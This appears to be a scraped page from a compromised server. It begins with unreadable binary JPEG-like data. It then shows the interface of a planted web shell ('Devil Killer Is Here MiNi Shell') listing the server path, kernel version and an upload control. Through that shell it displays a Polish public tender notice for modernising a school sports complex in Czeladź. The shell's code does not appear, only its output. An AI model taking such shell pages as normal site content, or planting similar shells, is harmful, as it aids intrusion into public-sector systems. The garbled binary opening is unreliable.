JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250530/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250530/0025708801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja istniejącego kompleksu sportowego „Orlik 2012” wraz z budową nowego obiektu sportowego- sprawnościowy plac zabaw przy Szkole Podstawowej Nr 3 w Czeladzi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa nr 3 im. Janusza Korczaka w Czeladzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000727050</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stanisława Staszica 47</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czeladź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-250</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32/ 265 -22- 90</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sp3korczak@sp3.czeladz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">sp3.czeladz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja istniejącego kompleksu sportowego „Orlik 2012” wraz z budową nowego obiektu sportowego- sprawnościowy plac zabaw przy Szkole Podstawowej Nr 3 w Czeladzi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8f603ecf-668e-4406-b581-e22dcc4416da</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00257088</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00246307/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja istniejącego kompleksu sportowego „Orlik 2012” wraz z budową nowego obiektu sportowego- sprawnościowy plac zabaw przy Szkole Podstawowej Nr 3 w Czeladzi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://sp3-czeladz.logintrade.net/zapytania_email,198674,3c8f23e4293ce7bf524e58f0a54519e1.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">z zastrzeżeniem postanowień dotyczących negocjacji treści oferty oraz przypadku awarii platformy, na której prowadzone jest postepowanie komunikacja między Zamawiającym a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, tj: poprzez Platformę przetargową , która jest stroną internetową prowadzonego postępowania. Adres strony internetowej prowadzonego postępowania - strona na której opublikowane będzie postępowanie, udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia oraz za pośrednictwem której będzie prowadzona komunikacja z wykonawcami (URL): https://sp3-czeladz.logintrade.net/zapytania_email,198674,3c8f23e4293ce7bf524e58f0a54519e1.html<br/>Ciąg dalszy w Rozdziale 13 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Instrukcje użytkowników Platformy przetargowej - Wykonawca zamierzający złożyć ofertę (ofertę składa się wyłącznie poprzez Platformę przetargową) zobowiązany jest: <br/>1)	zapoznać się z instrukcjami użytkowników Platformy przetargowej dostępnymi pod adresem: https://sp3-czeladz.logintrade.net/rejestracja/instrukcje.html<br/> Są tam instrukcje: <br/>a)	„Rejestracja Wykonawcy na platformie”, <br/>b)	„Zadawanie pytań do postępowania”, <br/>c)	„Wymagania techniczne”, <br/>d)	„Udział w trybie podstawowym z możliwością negocjacji” oraz <br/>2)	zaakceptować „Regulamin korzystania z Platformy przetargowej” dostępny pod adresem: https://sp3-czeladz.logintrade.net/rejestracja/regulamin.html<br/>2.	Regulamin korzystania z Platformy przetargowej - Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu, o którym mowa w ust. 1 pkt 2. <br/>3.	Wymagania techniczne związane z korzystaniem z Platformy przetargowej - wskazane są na stronie internetowej Platformy przetargowej - pod adresem podanym w ust 1 pkt 1). <br/>4.	Wsparcie techniczne - w zakresie działania Platformy przetargowej udziela jej dostawca, tj. Logintrade S.A., ul. Legnicka 57d, lokal B/J, 54-203 Wrocław, nr tel. +48 71 787 35 34, e-mail: helpdesk@logintrade.net od poniedziałku do piątku (dni robocze) w godz. 8:00 – 16:00.<br/>5.	Sposób złożenia oferty- Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia oferty (w zależności od wyboru opcji z logowaniem lub bez logowania), zostały opisane w Instrukcjach użytkowników Platformy przetargowej. Zaleca się dokonanie logowania. W celu złożenia oferty należy wejść na stronę platformy przetargowej. <br/>6.	Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe w tym oświadczenia, o których mowa w art. 117 ust 4 ustawy pzp, oraz zobowiązania podmiotu udostępniającego zasoby o których mowa w art. 118 ust 3 ustawy pzp, zwane dalej „zobowiązaniem podmiotu udostepniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne t.j: Dz.U. z 2024 r. poz. 1557), z zastrzeżeniem formatów, o których mowa w art. 66 ust.1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych. ( § 2 ust 1 rozporządzenia dot. wymagań technicznych dla dokumentów elektronicznych). <br/>7.	Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 6, przekazywane w postępowaniu o udzielenie zamówienia, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej, wskazanych przez Zamawiającego w SWZ. (§ 2 ust 2 rozporządzenia dot. wymagań technicznych dla dokumentów elektronicznych). <br/>8.	Składanie oferty - Ofertę składa się wyłącznie poprzez Platformę przetargową pod rygorem nieważności, zgodnie z wyborem Wykonawcy:<br/>1)	w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym), lub<br/>2)	w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>- Uwaga: Ilekroć w niniejszej SWZ jest mowa o ofercie, należy przez to rozumieć również ofertę dodatkową.<br/>9.	Tajemnica przedsiębiorstwa- W przypadku gdy dokumenty elektroniczne w postępowaniu o udzielenie zamówienia, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku.<br/>Ciąg dalszy w Rozdziale 14 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">kwestie RODO uregulowano w Rozdziale 22 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">kwestie RODO uregulowano w Rozdziale 22 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/1/SP3/2025/RB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacją zadania inwestycyjnego pod nazwą: Modernizacja istniejącego kompleksu sportowego „Orlik 2012” wraz z budową nowego obiektu sportowego- sprawnościowy plac zabaw przy Szkole Podstawowej nr 4 w Czeladzi. Zakres prac obejmuje branże budowalną, elektryczną oraz sanitarną. Zakres prac/ robót to w szczególności : <br/><br/>a)	Sprawnościowy plac zabaw : <br/>•	Oczyszczenie i zabezpieczenie terenu, <br/>•	Ogrodzenie terenu ogrodzeniem budowlanym, <br/>•	Wstępne wytyczenie lokalizacji planowanych nawierzchni i urządzeń, <br/>•	Zdjęcie warstwy gruntu zadarnionego (humus do rozplantowania, pozostały grunt do utylizacji), <br/>•	Demontaż/skucie oringu betonowego (obrzeża ogniska) wraz z wywiezieniem gruzu , <br/>•	Przygotowanie terenu metodą ręczną lub mechaniczną, <br/>•	Wykonanie fundamentów systemowych pod planowane ogrodzenie, <br/>•	Wykonanie fundamentów systemowych pod poszczególne elementy wyposażenia, <br/>•	Roboty budowlane związane z wykonaniem podbudowy pod proj. nawierzchnie, <br/>•	Ponowne wytyczenie planowanych nawierzchni, <br/>•	Wyrównanie i przygotowanie terenu pod nawierzchnie utwardzone, <br/>•	Wykonanie nawierzchni utwardzonych i nawierzchni bezpiecznych, <br/>•	Montaż elementów małej architektury i elementów wyposażenia na fundamentach systemowych, <br/>• Montaż tablic z regulaminem, <br/>•	Wykonanie mapy powykonawczej na zakończenie budowy, <br/>•	Uprzątnięcie terenu, <br/>•	Rekultywacja trawnika.<br/>•	Prace porządkowe <br/><br/>b)	Boisko do piłki nożnej : <br/>•	Demontaż i przygotowanie do transportu nawierzchni trawiastej syntetycznej z przeznaczeniem do ponownego montażu w innym miejscu; <br/>•	Demontaż pozostałej części nawierzchni trawiastej syntetycznej z przeznaczeniem do utylizacji; <br/>•	Transport nawierzchni zdemontowanej do magazynu oraz pozostałej części do utylizacji; <br/>•	Demontaż obrzeży wokół boiska oraz ponowny montaż z ich wypoziomowaniem; <br/>•	Czyszczenie i kamerowanie systemu drenażu boiska; <br/>•	Wymiana uszkodzonych ciągów drenażu wraz z odtworzeniem warstw podbudowy nawierzchni; <br/>•	Wykonanie warstwy wyrównawczej pod nową nawierzchnię; <br/>•	Montaż nowej nawierzchni z trawy syntetycznej wraz z liniami segregacyjnymi; <br/>•	Montaż infrastruktury towarzyszącej dla boiska (bramek, tablic); <br/>•	Uzupełnienie i wymiana siedzisk dla ławek w obrębie boiska; <br/>•	Montaż tabliczki z regulaminem oraz tablicy informacyjnej.<br/>c)	Boisko wielofunkcyjne : <br/>•	Zabezpieczenie istniejącego wyposażenia boiska wielofunkcyjnego, które nie zostanie zdemontowane na czas prowadzonej modernizacji; <br/>•	Zabezpieczenie przestrzeni wokół boiska (wraz z otaczającą zielenią) przed zanieczyszczeniami powstającymi w czasie natrysku; <br/>•	Zabezpieczenie terenu przed dostępem osób trzecich wraz z oznakowaniem; <br/>•	Wykonanie czyszczenia całej nawierzchni poliuretanowej z usunięciem mchów, głębokich zanieczyszczeń wraz z zastosowaniem środków odpowiednich do istniejącej materiału nawierzchni tak, aby nie pogorszyć jej stanu; <br/>•	Wykonanie zmycia środków czyszczących zachowują przepisy odnośnie ochrony środowiska; <br/>•	Dokonanie miejscowych, punktowych napraw uszkodzonej nawierzchni (ubytków w postaci dziur i pęknięć) w sposób trwały oraz aby po dokonaniu wszystkich czynności modernizujących nie były widoczne; <br/>•	Wykonanie nowej warstwy użytkowej tzw. retoping w postaci natrysku strumieniowego z granulatu EPDM oraz systemu poliuretanowego. Technologi i wykonanie musi być zgodne z kartą techniczną producenta systemu; <br/>•	Malowanie linii segregacyjnych boiska do koszykówki w kolorze białym oraz siatkówki w kolorze żółtym; <br/>•	Usunięcie zabezpieczeń ochronnych wraz z ich utylizacją, wyczyszczenie urządzeń wyposażenia boiska (kosze do koszykówki, słupki do naciągu siatki do siatkówki); <br/>•	Zakup i montaż nowych 2 tablicy do koszykówki wraz z obręczą i siatką <br/>•	Wymiana siatki ogrodzeniowej wraz z furtką wejścia wyposażoną w system automatyczne dociągu furtki po jej otwarciu.<br/><br/>d)	Ogrodzenie wraz z piłkochwytami: <br/><br/>•	Demontaż siatki stalowej ogrodzeniowej z terenu wokół boiska do gry w piłkę nożną oraz boiska wielofunkcyjnego; <br/>•	Oczyszczenie rdzewiejących miejsc na słupkach ogrodzeniowych i zabezpieczenie środkami antykorozyjnymi wraz z odtworzeniem powłoki ochronnej i kolorystycznej; <br/>•	Przycięcie słupków piłkochwytu do wysokości pozostałego ogrodzenia, zabezpieczenie antykorozyjnie miejsc cięcia oraz zamontowanie kapturów zabezpieczających profil; <br/>•	Wprowadzenie modyfikacji w słupkach ogrodzeniowych dla wzmocnienia instalacji siatki ogrodzeniowej. <br/>•	Zainstalowanie dodatkowych poprzeczek zespalająco-ściągających słupki przy ziemi pozwalających zamocować do nich siatkę z zawinięciem oraz dodatkowych poprzecznych wzmocnień w miejscach instalacji furtek (miejsca montażu wzmocnień zaznaczono na rysunku A.06); <br/>•	Wykonanie dodatkowego pośredniego słupa ogrodzeniowego dla montażu nowej furtki od strony osiedla (miejsce montażu zaznaczono na rys. A.06); <br/>•	Wymiana istniejących furtek (2 szt), wymiana istniejącej bramy wjazdowej na nową o wys. 4,0 m; <br/>•	Montaż systemu automatycznego dociągów wszystkich furtek po ich otwarciu tj. 2 szt wejścia na boisko do piłki nożnej, 1 szt na boisko wielofunkcyjne oraz 1 szt na teren sprawnościowego placu zabaw. Samodomyk musi zostać tak dobrany i wyregulowany, aby nie powodował uderzenia przy zamknięciu tzw. z cichym domykiem; <br/>•	Czyszczenie z graffiti i malowanie muru oporowego na którym zainstalowane jest ogrodzenie;<br/>•	Montaż siatki ogrodzeniowej stalowej powlekanej z wykorzystaniem istniejących słupków; <br/>•	Wywiezienie i utylizacja starego ogrodzenia; <br/>•	Wykonanie nowej linii piłkochwytów (8 słupków) tuż za linią boiska z wybiegiem (na terenie utwardzonym) wraz z montażem siatki; <br/>•	Montaż nowego ogrodzenia przy dla sprawnościowego placu zabaw wraz z nową furtką.<br/><br/>Opis Przedmiotu Zamówienia stanowi Załącznik Nr 4 do SWZ, OPZ składa się z Dokumentacji Projektowej i STWiORB. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45214200-2 - Roboty budowlane w zakresie budowy obiektów budowlanych związanych ze szkolnictwem</p> <p class="mb-0">39293300-5 - Sztuczna trawa</p> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">37451000-4 - Sprzęt do sportów uprawianych na boiskach</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <p class="mb-0">31520000-7 - Lampy i oprawy oświetleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert - <br/>Ocena w zakresie kryterium „Cena ofertowa brutto” – będzie dokonana na podstawie ilości wyliczonych punktów. Wyliczenia dokona się w następujący sposób: Pc = (CN/ CB) x 100 punktów gdzie poszczególne litery/znaki oznaczają:<br/>„Pc” – Ilość punktów dla oferty badanej w Kryterium „Cena oferty brutto” <br/> „CN” – Najniższa Cena ofertowa za zamówienie spośród wszystkich rozpatrywanych i niepodlegających odrzuceniu ofert,<br/>„CB” – Badana Cena -Cena ofertowa badanej/ przeliczanej oferty,<br/>„/”- dzielone<br/>„x”- pomnożenie<br/><br/>Oferta najkorzystniejsza - Za ofertę najkorzystniejszą będzie uznana oferta, która nie podlega odrzuceniu, i uzyskała najwyższą ilość punktów. <br/>	Uwaga: Jeżeli w postępowaniu o udzielenie zamówienia, w którym jedynym kryterium oceny ofert jest cena, nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę (art. 249 ustawy Pzp). <br/>	Uwaga: Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług, dla celów zastosowania kryterium ceny Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć.<br/>	Uwaga: Przy obliczaniu Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku według zasady, że trzecia cyfra po przecinku od 5 w górę powoduje zaokrąglenie drugiej cyfry po przecinku w górę o 1. Jeśli trzecia cyfra po przecinku jest mniejsza niż 5, to druga cyfra po przecinku nie ulega zmianie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Warunki udziału w postępowaniu spośród warunków o których mowa w art. 112 ust 2 Pzp: <br/>1)	Zdolność do występowania w obrocie gospodarczym: Zamawiający NIE określa warunków w tym zakresie.<br/>2)	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej: Zamawiający NIE określa warunków w tym zakresie.<br/>3)	Sytuacja ekonomiczna lub finansowa: Zamawiający NIE określa warunków w tym zakresie;<br/><br/>4)	Zdolność techniczna lub zawodowa w zakresie doświadczenia : <br/>a)	Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże, że: w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie wykonał jedną należycie wykonaną robotę budowlaną obejmującą budowę lub przebudowę lub remont na obiekcie sportowym - nawierzchni z trawy syntetycznej o powierzchni co najmniej 1500 m2. W przypadku przebudowy określona powierzchnia dotyczy powierzchni po przebudowie. <br/><br/>b)	Zamawiający uzna, że Wykonawca spełnia warunek jeżeli wykaże, że : w okresie ostatnich 5 lat przed upływem terminu składania ofert, a 